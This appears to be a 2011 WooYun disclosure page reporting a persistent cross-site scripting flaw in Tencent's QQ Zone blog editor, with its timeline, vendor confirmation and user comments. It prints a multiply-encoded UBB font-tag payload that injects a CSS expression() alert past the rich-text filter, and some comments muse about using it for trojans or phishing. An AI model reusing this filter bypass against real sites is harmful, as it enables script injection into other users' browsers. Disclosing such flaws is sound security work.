当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2011-01937

漏洞标题: QQ空间跨站

相关厂商: 腾讯

漏洞作者: s!lly3r

提交时间: 2011-04-19

公开时间: 2011-05-20

漏洞类型: xss跨站脚本攻击

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org

Tags标签: 富文本策略绕过 持久型xss sns类型应用xss xss发生点上下文敏感


漏洞详情

披露状态:

2011-04-19: 细节已通知厂商并且等待厂商处理中
2011-04-20: 厂商已经确认,细节仅向厂商公开
2011-05-05: 细节已向核心白帽子及相关领域专家开放
2011-05-20: 细节向全体白帽子公开
2011-06-04: 细节向公众公开

简要描述:

XSS~`持久存储的

详细说明:

日志ubb代码

[ft=p,,A\002f\0026\0023\0033\0039\003b\003B\0026\0023\0031\0031\0039\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0030\0030\003b\0026\0023\0031\0031\0036\003b\0026\0023\0031\0030\0034\003b\0026\0023\0035\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0032\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0031\0031\003b\0026\0023\0031\0031\0030\003b\0026\0023\0034\0030\003b\0026\0023\0039\0037\003b\0026\0023\0031\0030\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0031\0036\003b\0026\0023\0034\0030\003b\0026\0023\0034\0037\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0034\0037\003b\0026\0023\0034\0031\003b\0026\0023\0034\0031\003b\0026\0023\0035\0039\003b\0026\0023\0034\0037\003b\0026\0023\0034\0032\003b]xd[/ft]

漏洞证明:

修复方案:

^_^

版权声明:转载请注明来源 s!lly3r@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2011-04-20

厂商回复:

thx

最新状态:

暂无

(2)(0)

评论

  1. 2011-04-20 12:19 | xDo (白帽子 | Rank:39 漏洞数:10 | …对那飘过的浮云说声我想你…)

    强大,应该公开一下下。。。。

  2. 2011-05-20 13:17 | 习惯一个人 (白帽子 | Rank:2 漏洞数:1 | 动荡年代,我只图个安宁…)

    这个牛B,哈,若是用来挂马或掉鱼,效果杠杠的.

  3. 2011-05-20 13:35 | pg5yl8 (核心白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)

    好邪恶啊

  4. 2011-05-20 13:43 | 昆仑心然 (白帽子 | Rank:19 漏洞数:3 )

    6分....

  5. 2011-05-20 20:33 | p.z (核心白帽子 | Rank:222 漏洞数:14 | 不搞姑娘的男青年,只能等其他男青年来搞他.)

    6分...

  6. 2011-05-20 20:51 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

    6分...

  7. 2011-05-27 15:50 | 葉孒 (白帽子 | Rank:9 漏洞数:2 | test)

    6分...

  8. 2011-06-29 13:22 | 蚊虫 (白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛逼还是没妞喜欢我)

    6分... 卖钱的话应该可以加几个零

  9. 2011-07-29 10:41 | rayh4c (核心白帽子 | Rank:240 漏洞数:22 | 我弹框这么牛逼还是没妞喜欢我)

    赞 和腾讯杠上了 你 - -

  10. 2011-07-29 14:52 | youstar (白帽子 | Rank:23 漏洞数:5 | 我们人啊~)

    咋把这些洞都爆了

登录后才能发表评论,请先 登录